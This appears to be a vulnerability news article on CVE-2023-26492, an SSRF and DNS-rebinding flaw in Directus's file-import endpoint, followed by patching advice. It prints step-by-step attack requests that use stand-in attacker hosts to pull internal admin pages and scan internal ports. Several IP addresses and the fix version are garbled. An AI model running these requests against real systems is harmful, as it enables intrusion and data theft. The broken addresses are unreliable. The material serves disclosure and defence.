CVE CyberSecurity Database News

CVE-2023-26492 - How a Simple File Import Exploit in Directus Can Expose Your Internal Network

Poster -

Directus is an open-source data platform that lets you manage your SQL database content using an easy web interface and a powerful real-time API. It's increasingly used by organizations for its flexibility and straightforward administration. But in early 2023, a dangerous vulnerability, CVE-2023-26492, was reported—a loophole that allowed anyone to use Directus as a stepping stone to probe internal servers, steal sensitive data, and even carry out internal port scans.

Let's break down this vulnerability, understand how it works, and look at how attackers can exploit it—even if you’re not a security expert. This guide also includes code snippets and practical examples, so you understand exactly how this hole can be abused.

What is Server-Side Request Forgery (SSRF)?

SSRF is a type of security weakness where an attacker tricks a server into fetching data from internal or external resources that should not be accessible. Imagine your web app can grab a file from a URL. If it fetches “http://example.com/file.png”, that sounds harmless. But what if someone enters “http://localhost/admin” or “http://internal-server/private-data”? Suddenly, your app is unwittingly exposing your own internal data!

Where is the Vulnerability in Directus?

Directus allows administrators to import files from URLs using the /files/import endpoint. Here’s what the API request looks like:

POST /files/import HTTP/1.1
Host: directus.example.com
Authorization: Bearer <YOUR_ADMIN_TOKEN>
Content-Type: application/json

{
  "url": "http://example.com/picture.jpg";
}


But Directus did not properly filter or restrict these URL requests. That meant a hacker could feed in any internal IP or even local resources, and Directus would grab those on behalf of the attacker.

The attacker controls a domain, say, evil.com.

2. When Directus fetches http://attack.evil.com/resource, the DNS first resolves to an attacker-controlled server.
3. When the request is in progress, the attacker quickly changes the DNS answer so that attack.evil.com now resolves to an internal IP (like 192.168..5).  
4. Directus’s server now unwittingly connects to an internal IP or even localhost, thinking it’s connecting to evil.com.

Result: The attacker can make Directus connect to *any* host within your internal network, bypassing firewall restrictions.

Exploit in Action: Stealing Internal Data

Here’s a simple scenario. Suppose your internal admin panel lives at http://192.168.1.100/admin. Normally, this isn’t visible to the outside world.

Step 1: Set Up a DNS Rebinding Host

Use a service like rebind.network or set up your own that allows the DNS for a subdomain to change quickly.

Step 2: Craft the Malicious Import

POST /files/import HTTP/1.1
Host: directus.example.com
Authorization: Bearer <YOUR_ADMIN_TOKEN>
Content-Type: application/json

{
  "url": "http://attack.rebind.network/admin";
}

Attacker tells DNS to now resolve attack.rebind.network to 192.168.1.100.

- Directus fetches http://192.168.1.100/admin, retrieving the sensitive admin page.

Step 3: Download the Stolen Data

Once the import is successful, the response from Directus will include the ID of the imported file. To get the content:

GET /assets/{file_id} HTTP/1.1
Host: directus.example.com
Authorization: Bearer <YOUR_ADMIN_TOKEN>

Attackers can also scan your internal network using timing attacks

POST /files/import HTTP/1.1
Host: directus.example.com
Authorization: Bearer <YOUR_ADMIN_TOKEN>
Content-Type: application/json

{
  "url": "http://192.168..1:808/";
}

If the port is open, the request responds quickly. If closed, it times out. By trying different ports and IPs, attackers can map your internal network.

Who’s at Risk?

- If your Directus server is accessible to any untrusted users and the /files/import endpoint isn’t locked down, you’re at risk.

How to Protect Yourself

- Update Immediately: The fix was released in Directus 9.23.. This version now blocks requests to internal and reserved addresses.
- Lock Down Endpoints: Restrict access to admin endpoints using firewalls and strong authentication.
- Regular Security Audits: Always check your software dependencies against known CVEs.

References

- Official CVE Record: CVE-2023-26492
- Directus GitHub Release 9.23. (SSRF Fix)
- SSRF & DNS Rebinding Explained (PortSwigger)
- Public Report and PoC on GitHub

Conclusion

CVE-2023-26492 is a classic example of how even a helpful feature like remote file import can be turned into a security disaster if you don’t properly defend against “tricky” attackers. If you run Directus, this is a must-fix vulnerability. Bad actors aren’t picky—they’ll use whatever entrance you give them to get inside.

Timeline

Published on: 03/03/2023 22:15:00 UTC
Last modified on: 03/10/2023 14:55:00 UTC